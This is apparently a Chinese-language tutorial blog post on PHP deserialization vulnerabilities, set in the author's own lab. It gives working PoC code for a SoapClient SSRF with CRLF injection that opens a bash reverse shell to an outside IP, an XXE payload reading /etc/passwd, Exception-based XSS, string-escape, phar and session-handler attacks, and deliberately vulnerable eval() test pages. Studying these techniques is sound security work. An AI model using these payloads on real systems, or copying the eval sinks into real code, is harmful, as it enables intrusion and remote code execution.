PHP反序列化学习

前言

非常普通的PHP反序列化漏洞

PHP反序列化基础

php中使用serialize()函数和unserialize()函数对变量进行序列化与反序列化。unserialize()函数在反序列化过程中发生了错误会返回false。

<?php
class persion{
   public $name="eastjun";
   public $age=19;
   public $isAdmin=true;
}
echo serialize(new persion());

执行上面的代码将会输出O:7:"persion":3:{s:4:"name";s:7:"eastjun";s:3:"age";i:19;s:7:"isAdmin";b:1;}

利用反序列化进行攻击需要找到php中的魔术方法，魔术方法在满足一定条件时会自动调用，常见魔术方法如下：

__construct()     //构造函数，创建对象时调用
__destruct()     //析构函数，对象被销毁时调用
__call()         //在对象中调用一个不可访问方法时
__callStatic()   //在静态上下文中调用一个不可访问方法时
__get()           //读取不可访问属性的值时
__set()           //在给不可访问属性赋值时
__iset()         //当对不可访问属性调用 isset() 或 empty() 时
__unset()         //当对不可访问属性调用 unset() 时
__sleep()         //序列化对象前调用
__wakeup()       //反序列化恢复对象前调用
__toString()     //对象被当成字符串使用时
__invoke()       //尝试以调用函数的方式调用一个对象时

__wakeup函数绕过(CVE-2016-7124)

在PHP5 < 5.6.25、PHP7 < 7.0.10的版本中，当成员属性数目大于实际数目时可绕过__wakeup方法，例如O:7:"persion":4:{s:4:"name";s:7:"eastjun";s:3:"age";i:19;s:7:"isAdmin";b:1;}在上述版本的PHP进行反序列化时不会执行__wakeup()方法。

public、private、protected反序列化

序列化时如果对象的属性被(public、private、protected)修饰时，属性的名称不同，private和protected类型的属性在序列化时会出现不可见字符%00

• public：序列化时属性名不变

• private：序列化时属性名为%00*%00属性名

• protected：序列化时属性名为%00类名%00属性名

原生类利用

SoapClient

php中存在内置原生类SoapClient（需要php安装soap扩展），利用SoapClient类可以进行SSRF，我的环境是在docker中的，需要先安装Soap模块然后重启apache2：

apt install -y libxml++2 && docker-php-ext-install soap

php在调用某个对象不存在的函数时会调用该对象的__call方法，调用SoapClient类的__call方法时可以进行SSRF攻击

SSRF测试代码：

<?php
$a = new SoapClient(null,array('uri'=>'aaaa', 'location'=>'http://172.20.249.108:7777/eastjun'));
$b = serialize($a);
echo urlencode($b);
$c = unserialize($b);
$c->notexist();

执行结果如下：

还可以通过CRLF注入进行更深入的利用：

<?php
$a = new SoapClient(null,array('uri'=>'aaaa', 'location'=>'http://172.20.249.108:7777/eastjun'));
$b = serialize($a);
echo urlencode($b);
$c = unserialize($b);
$c->notexist();

执行结果：

在SoapClient构造方法的PHP文档中可以找到：

The user_agent option specifies string to use in User-Agent header.

在SoapClient的第二个参数中可以自定义SoapClient的UA，于是可以通过在UA处进行CRLF注入将Content-Type挤下达到攻击内网WEB服务的目的，因为有Content-Length，服务器会忽略shell=xxx后面的部分

例如写下这样一段代码放在docker环境中：

<?php
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){
      eval($_POST['shell']);
  }
else{
   echo "not localhost";
}
$a=unserialize($_GET['ser']);
$a->notexist();
?>

直接用浏览器访问是访问不到的，但是有反序列化，可通过SoapClient类构造POST请求进行SSRF

<?php
$poc = "shell=".urlencode('system("bash -c \'bash -i >& /dev/tcp/172.20.249.108/7777 0>&1\'");?>');
$a = new SoapClient(null,array('uri'=>"aaaa", 'location'=>'http://127.0.0.1/shell.php',"user_agent"=>"Eastrome\r\nContent-Length: ".strlen($poc)."\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n".$poc,"keep_alive"=>false));
$b = serialize($a);
echo urlencode($b);

反序列化后可以反弹shell：

Error/Exception

__toString()方法在对象被当成字符串使用时调用，Exception类没有对错误消息进行过滤，反序列化后输出的内容在网页中可以造成xss。

测试代码如下：

<?php
$poc = "<script>alert(1);</script>";
$b = serialize(new Exception($poc));
echo unserialize($b);

可以触发xss

SimpleXMLElement

反序列化通常无法调用类的__construct方法，但在某些情况下（例如下面的一段代码）可以进行任意类实例化，能够调用__construct方法，可以进行XXE。

<?php
if(class_exists($classname)&&isset($_GET['name'])&&isset($_GET['param'])&&isset($_GET['param2'])){
   $classname = $_GET['name'];
   $param = $_GET['param'];
   $param2 = $_GET['param2'];
   $a = new $classname($param,$param2);
   echo $a;
}

payload：

?name=SimpleXMLElement&param=<?xml version="1.0" ?><!DOCTYPE ANY[<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><root>%26xxe;</root>&param2=2

反序列化字符逃逸

对用户的输入没有正确过滤，然后进行反序列化，需要序列化的字符串在过滤后有长度的变化，反序列化字符串逃逸有字符串变长和变短两种类型：

变长

例如下面的一段代码：

<?php
function filter($str){
   return str_replace("jan", "hacker", $str);
}
class A{
   public $user = "jun";
   public $file = "pic.jpg";
   public function show(){
       echo '<img src="data:image/jpg;base64,'.base64_encode(file_get_contents($this->file)).'" alt="" />';
  }
}
$a = new A();
if(isset($_GET['user'])){
   $a->user=$_GET['user'];
   $a = unserialize(filter(serialize($a)));
}
echo $a->file;
$a->show();

unserialize函数在得到足够的字符后读取到}时认为反序列化已经结束，不会读取后面的字符，

如果输入的user参数为janjanjanjanjanjanjanjanjanjanjan";s:4:"file";s:11:"/etc/passwd";}，经过序列化得到的字符串和经过过滤后得到的字符串如下：

//序列化字符串：

O:1:"A":2:{s:4:"user";s:66:"janjanjanjanjanjanjanjanjanjanjan";s:4:"file";s:11:"/etc/passwd";}";s:4:"file";s:7:"pic.jpg";}//经过过滤后：

O:1:"A":2:{s:4:"user";s:66:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:4:"file";s:11:"/etc/passwd";}";s:4:"file";s:7:"pic.jpg";}

经过反序列化则其中的$file参数会变为/etc/passwd，类中的参数变得可控

变短

例如这样一段代码：

<?php
function filter($str){
   return preg_replace("/eastjun|hack/", "", $str);
}
class A{
   public $user = "jun";
   public $pass = "123456";
   public $file = "pic.jpg";
   public function show(){
       echo '<img src="data:image/jpg;base64,'.base64_encode(file_get_contents($this->file)).'" alt="" />';
  }
}
$a = new A();
if(isset($_GET['user'])&&isset($_GET['pass'])){
   $a->user=$_GET['user'];
   $a->pass=$_GET['pass'];
   $a = unserialize(filter(serialize($a)));
}
echo $a->file;
$a->show();

变短的反序列化需要两个参数

首先使得pass的值设置为;s:4:"pass";s:6:"123456";s:4:"file";s:11:"/etc/passwd";}，打印出序列化字符串为O:1:"A":3:{s:4:"user";s:3:"jun";s:4:"pass";s:56:";s:4:"pass";s:6:"123456";s:4:"file";s:11:"/etc/passwd";}";s:4:"file";s:7:"pic.jpg";}，只要使得user的参数被filter函数过滤为空，将后面的";s:4:"pass";s:56:吃掉就能修改file的值为/etc/passwd。

所以需要user的值为eastjuneastjunhack，pass的值为;s:4:"pass";s:6:"123456";s:4:"file";s:11:"/etc/passwd";}，经过序列化得到的字符串和经过过滤后得到的字符串如下：

//序列化字符串：

O:1:"A":3:{s:4:"user";s:18:"eastjuneastjunhack";s:4:"pass";s:56:";s:4:"pass";s:6:"123456";s:4:"file";s:11:"/etc/passwd";}";s:4:"file";s:7:"pic.jpg";}

//经过过滤后：

O:1:"A":3:{s:4:"user";s:18:"";s:4:"pass";s:56:";s:4:"pass";s:6:"123456";s:4:"file";s:11:"/etc/passwd";}";s:4:"file";s:7:"pic.jpg";}

Phar反序列化

phar是一种类似jar的打包文件，它的本质是一种特殊的压缩包。

phar由stub/manifest/contents/signature四部分组成：

1. stub：是phar文件标识，前面的内容不限，以__HALT_COMPILER();结尾，?>是可选的

2. manifest：储存压缩包属性信息，其中以序列化的形式储存了Meta-data

3. contents：压缩文件的内容

4. signature：储存签名信息

在进行文件操作的时候使用phar协议会触发反序列化，例如file_exists()、fopen()、filesize()、include()等函数。

受影响的函数如下(来自seebug)：

在这里还有一些其他的可用于phar反序列化的函数

下面的代码可用于测试phar反序列化：

<?php
highlight_file(__FILE__);
class A{
public $cmd = "";
public function __destruct(){
eval($this->cmd);
}
}
​
if(isset($_GET['file'])){
$file = $_GET['file'];
echo file_exists($file);
}

生成phar文件首先需要将php.ini中的phar.readonly设置为Off或0，phar生成代码：

<?php
Class A{
public $cmd = "phpinfo();";
public function __destruct(){
echo $this->cmd;
}
}
$a = new A();
$p = new Phar("eastjun.phar",0);
$p->startBuffering();
$p->setMetadata($a);
$p->setStub("GIF89a__HALT_COMPILER();");
$p->addFromString("test.txt","a test text");
$p->stopBuffering();

将生成的phar文件丢到010editor中可以看到序列化的字符串：

将生成的phar文件传到服务器上然后用GET方法传入file=phar://eastjun.phar/test.txt就能进行反序列化执行phpinfo()

在实际利用的过程中需要有文件上传点、文件操作的函数以及phar://伪协议

Session反序列化

php存在一些默认的session处理器：php、php_binary、php_serialize，三种处理器保存session的格式不同，保存session的时候会经过序列化，读取时进行反序列化：

三种处理器保存的session如下：

//php处理器
name|s:7:"eastjun";
//php_serialize处理器
a:1:{s:4:"name";s:7:"eastjun";}
//php_binary处理器
•names:7:"eastjun";

php的session机制没有问题，但是session使用不当，例如session保存与读取使用的处理器不一致时会出问题。

例如在session.php中写入

<?php
ini_set("session.serialize_handler", "php_serialize");
session_start();
$_SESSION["name"]='eastjun';
if(isset($_GET['name'])){
   $_SESSION["name"]=$_GET['name'];
}
var_dump($_SESSION);
?>

在session_ser.php中写入

<?php
//使用默认的php处理器处理session
class A{
public $cmd = "phpinfo();";
public function __destruct(){
eval($this->cmd);
}
}
session_start();
var_dump($_SESSION);

使用php_serialize处理器保存session，使用php处理器读取session，传入的name参数为|O:1:"A":1:{s:3:"cmd";s:10:"phpinfo();";}时：

php_serialize处理器保存的session为

a:1:{s:4:”name”;s:41:”|O:1:”A”:1:{s:3:”cmd”;s:10:”phpinfo();”;}“;}

php处理器读取的session为

a:1:{s:4:”name”;s:41:”|O:1:”A”:1:{s:3:”cmd”;s:10:”phpinfo();”;}”;}

然后php处理器会将后面的O:1:"A":1:{s:3:"cmd";s:10:"phpinfo();";}";}字符串进行反序列化

Referer

利用 phar 拓展 php 反序列化漏洞攻击面

由 PHPGGC 理解 PHP 反序列化漏洞

phar扩展php反序列化的攻击面

PHP反序列化入门之session反序列化